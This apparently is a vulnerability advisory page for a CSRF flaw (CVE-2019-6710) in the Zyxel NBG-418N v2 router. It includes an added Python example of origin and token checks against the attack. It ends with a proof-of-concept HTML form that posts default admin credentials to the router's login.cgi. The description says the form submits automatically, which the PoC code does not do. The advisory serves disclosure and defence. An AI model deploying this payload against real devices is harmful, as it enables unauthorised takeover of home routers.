vendor: NBG-418N v2
by: Ali Can Gönüllü
CVSS: 8.8 (HIGH)
CWE: 352 (CSRF)
Product Name: NBG-418N v2
Affected Version From: V1.00(AAXM.6)C0
Affected Version To: V1.00(AAXM.6)C0
Patch Exists: YES
Related CWE: CVE-2019-6710
CPE: h:zyxel:nbg-418n_v2
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 x64
2019

NBG-418N v2 Modem CSRF Exploit & PoC

This exploit allows an attacker to perform a CSRF attack on the Zyxel NBG-418N v2 Modem. The attacker can craft a malicious HTML page that contains a form with the username and password fields pre-filled with the credentials of the admin user. When the victim visits the malicious page, the form will be automatically submitted and the attacker will gain access to the modem.

Mitigation:

The vendor has released a firmware update to address this vulnerability.
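
How a login handler can refuse the cross-site form post described above, shown as an added example that is not part of the original advisory and is not Zyxel's firmware code. The function names, the `csrf_token` field, the session id and the sample requests are hypothetical; the admin origin `http://10.0.0.1` is taken from the PoC's form action.

```python
# Added example (not vendor code): origin and token checks for a login POST.
import hashlib
import hmac
import secrets
from typing import Optional
from urllib.parse import urlsplit

# Origin of the device's own admin UI (address taken from the PoC form action).
ALLOWED_ORIGINS = {"http://10.0.0.1"}
# Assumption: a random secret generated at boot and never sent to the browser.
SECRET = secrets.token_bytes(32)


def issue_login_token(session_id: str) -> str:
    """Token placed in a hidden field when the device serves its own login page."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def request_origin(headers: dict) -> Optional[str]:
    """Origin of the page that sent the request, from Origin or else Referer.

    Assumes header names were already normalised to this capitalisation.
    """
    value = headers.get("Origin") or headers.get("Referer")
    if not value or value == "null":      # sandboxed or opaque origins send "null"
        return None
    parts = urlsplit(value)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()


def is_login_post_allowed(headers: dict, session_id: str, form: dict) -> bool:
    """Accept a login POST only when it came from the device's own login page."""
    # 1. A form hosted on another site carries that site's origin, so reject it.
    if request_origin(headers) not in ALLOWED_ORIGINS:
        return False
    # 2. A foreign page cannot read the token bound to this pre-login session.
    expected = issue_login_token(session_id).encode()
    supplied = str(form.get("csrf_token", "")).encode()
    return hmac.compare_digest(expected, supplied)
```

Both checks fail closed: a request with no Origin or Referer header, or without the hidden token, is treated as cross-site and refused.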

Exploit-DB raw data:

<!--
# Exploit Title: Zyxel NBG-418N v2 Modem CSRF Exploit & PoC
# Version: Zyxel NBG-418N v2 - V1.00(AAXM.6)C0
# Tested on: Windows 10 x64
# CVE : CVE-2019-6710
# Author : Ali Can Gönüllü
# Twitter : @alicangonullu

Exploits :
-->

<html><head>
<title>NBG-418N v2 Modem CSRF Exploit & PoC</title>
</head><body>
<form action="http://10.0.0.1/login.cgi" method="POST">
<input type="text" name="username" id="username" value="admin" /><br />
<input type="text" name="password" id="password" value="1234" /><br />
<input id="loginBtn" onclick="return onlogin()" type='submit' value='Go!' />
<input type="hidden" name="submit.htm?login.htm" value="Send">
</form>
</body></html>